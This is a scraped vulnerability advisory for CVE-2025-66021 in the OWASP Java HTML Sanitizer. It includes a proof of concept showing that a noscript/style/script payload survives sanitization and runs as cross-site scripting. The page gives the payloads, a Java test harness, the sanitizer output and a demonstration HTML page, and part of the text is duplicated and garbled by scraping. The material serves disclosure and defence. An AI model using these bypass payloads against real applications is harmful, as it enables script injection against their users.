\n2.

\n\n\nPAYLOAD:

\n\n```\n\n5. Lets understand what happened in sanitization process below \n\n```txt\n--------------------------| --> anything after style tag is cosidered as CSS and not sanitized \nPAYLOAD: \n\n-------------------| --> anything after style tag is cosidered as CSS and not sanitized \nPAYLOAD:

\n\n```\n\n6. Lets create a sample html page and copy both sanitized output which should be generated in step 5 \n\n```HTML\n\n\n\n\n \n \n\n\n\n\n\n\n\n

\n\n\n\n```\n\n\n\n7. Open this HTML page in the browser it should pop an alert.\n\n![Alt text](https://github.com/user-attachments/assets/0b96a6c2-818e-4a21-80df-42c4cf26bafd \"Leads to XSS\")\n\n8. Open inspect element to understand what happened. If users look closely a payload combined with p tag and style tag did not cause XSS and browser percived anything after style tag as CSS. \n\n![SAFE from XSS](https://github.com/user-attachments/assets/b6c657fc-32df-4006-9ee8-ca6598f094ad \"Safe from XSS\")\n\n9. The payload which combined with noscript tag and style tag did caused XSS.\nThe broswer perceived noscript and which wrapped `style` tag then closed noscript tag and after that script payload is considered as valid HTML tag and it executed in browser and this leads to XSS because this is very different then what happened in the last example with p tag.\n\n![XSS POC](https://github.com/user-attachments/assets/abfe0112-c63e-4149-a343-509b25db1b60 \"Leads to XSS\")\n\n\n### Impact\n1. This potentially could leads to XSS in applications. \nRef : https://owasp.org/www-community/attacks/xss/","datePublished":"2026-05-30T08:48:58.317000","dateModified":"2026-05-30T10:06:50.211000","author":{"@type":"Organization","name":"Strobes Security","url":"https://strobes.co"},"publisher":{"@type":"Organization","name":"Strobes VI","url":"https://vi.strobes.co"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://vi.strobes.co/cve/CVE-2025-66021"},"about":{"@type":"Thing","name":"CVE-2025-66021","description":"Security vulnerability CVE-2025-66021 with CVSS score 6.1"},"keywords":["CVE-2025-66021","CVE","vulnerability","security","medium","patch available","Java Html Sanitizer"]}\n2.

\n\n\nPAYLOAD:

\n\n```\n\n5. Lets understand what happened in sanitization process below \n\n```txt\n--------------------------| --> anything after style tag is cosidered as CSS and not sanitized \nPAYLOAD: \n\n-------------------| --> anything after style tag is cosidered as CSS and not sanitized \nPAYLOAD:

\n\n```\n\n6. Lets create a sample html page and copy both sanitized output which should be generated in step 5 \n\n```HTML\n\n\n\n\n \n \n\n\n\n\n\n\n\n

\n\n\n\n```\n\n\n\n7. Open this HTML page in the browser it should pop an alert.\n\n![Alt text](https://github.com/user-attachments/assets/0b96a6c2-818e-4a21-80df-42c4cf26bafd \"Leads to XSS\")\n\n8. Open inspect element to understand what happened. If users look closely a payload combined with p tag and style tag did not cause XSS and browser percived anything after style tag as CSS. \n\n![SAFE from XSS](https://github.com/user-attachments/assets/b6c657fc-32df-4006-9ee8-ca6598f094ad \"Safe from XSS\")\n\n9. The payload which combined with noscript tag and style tag did caused XSS.\nThe broswer perceived noscript and which wrapped `style` tag then closed noscript tag and after that script payload is considered as valid HTML tag and it executed in browser and this leads to XSS because this is very different then what happened in the last example with p tag.\n\n![XSS POC](https://github.com/user-attachments/assets/abfe0112-c63e-4149-a343-509b25db1b60 \"Leads to XSS\")\n\n\n### Impact\n1. This potentially could leads to XSS in applications. \nRef : https://owasp.org/www-community/attacks/xss/"}},{"@type":"Question","name":"What is the severity of CVE-2025-66021?","acceptedAnswer":{"@type":"Answer","text":"CVE-2025-66021 has a CVSS v3 score of 6.1, which is classified as Medium severity."}},{"@type":"Question","name":"Is there an exploit available for CVE-2025-66021?","acceptedAnswer":{"@type":"Answer","text":"No known public exploits are currently available for CVE-2025-66021."}},{"@type":"Question","name":"Is there a patch available for CVE-2025-66021?","acceptedAnswer":{"@type":"Answer","text":"Yes, patches are available for CVE-2025-66021. Check the vendor advisories for update instructions."}}]}

1. <noscript><style></noscript><script>alert(1)</script>
2. <p><style></p><script>alert(1)</script>

public class main {
	private static final String ALLOWED_HTML_TAGS = "p, noscript, style";

	/**
	 * Description of vulnerability :
	 *  The OWASP Sanitizer sanitize the user inputs w.r.t to defined whitelisted HTML tags.
	 *  However, if script tags is not allowed in the HTML element policy yet it can lead to XSS in edge cases.
	 */

	public static void main(String[] args) {
		withAllowedTextAndStyleTag();
	}

	/**
	 *  Test case : Vulnerable to XSS
	 */
	public static void withAllowedTextAndStyleTag() {
		HtmlPolicyBuilder htmlPolicyBuilder = new HtmlPolicyBuilder();
		PolicyFactory policy = htmlPolicyBuilder
				.allowElements(ALLOWED_HTML_TAGS.split("\\s*,\\s*"))
				.allowTextIn("style")
				.toFactory();
		String untrustedHTMLOne = "<noscript><style></noscript><script>alert(1)</script>";
		String untrustedHTMLTwo = "<p><style></p><script>alert(1)</script>";

		System.out.println("PAYLOAD: " + untrustedHTMLOne +"\nSANITIZED OUTPUT: " + policy.sanitize(untrustedHTMLOne));
		System.out.println("PAYLOAD: " + untrustedHTMLTwo +"\nSANITIZED OUTPUT: " + policy.sanitize(untrustedHTMLTwo));
	}
}

		<dependency>
			<groupId>com.googlecode.owasp-java-html-sanitizer</groupId>
			<artifactId>owasp-java-html-sanitizer</artifactId>
			<version>20240325.1</version>
		</dependency>

PAYLOAD: <noscript><style></noscript><script>alert(1)</script>
SANITIZED OUTPUT: <noscript><style></noscript><script>alert(1)</script></style></noscript>


PAYLOAD: <p><style></p><script>alert(1)</script>
SANITIZED OUTPUT: <p><style></p><script>alert(1)</script></style></p>

--------------------------| --> anything after style tag is cosidered as CSS and not sanitized 
PAYLOAD: <noscript><style> {</noscript><script>alert(1)</script>} -> CSS

-----------------------------------| --> after sanitization, payload in script tag remained same and style and noscript tags is closed. 
SANITIZED OUTPUT: <noscript><style>{</noscript><script>alert(1)</script>}</style></noscript>

-------------------| --> anything after style tag is cosidered as CSS and not sanitized 
PAYLOAD: <p><style></p>{<script>alert(1)</script>} -> CSS

--------------------------- | --> after sanitization payload in script tag remained same and style and p tags is closed. 
SANITIZED OUTPUT: <p><style>{</p><script>alert(1)</script>}</style></p>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>POC OF SANITIZER OUTPUT</title>
</head>
<body>

<!--XSS OUTPUT : <noscript><style></noscript><script>alert(1)</script></style></noscript>-->
<noscript><style></noscript><script>alert(1)</script></style></noscript>

<!-- SAFE OUTPUT -->
<p><style></p><script>alert(1)</script></style></p>

</body>
</html>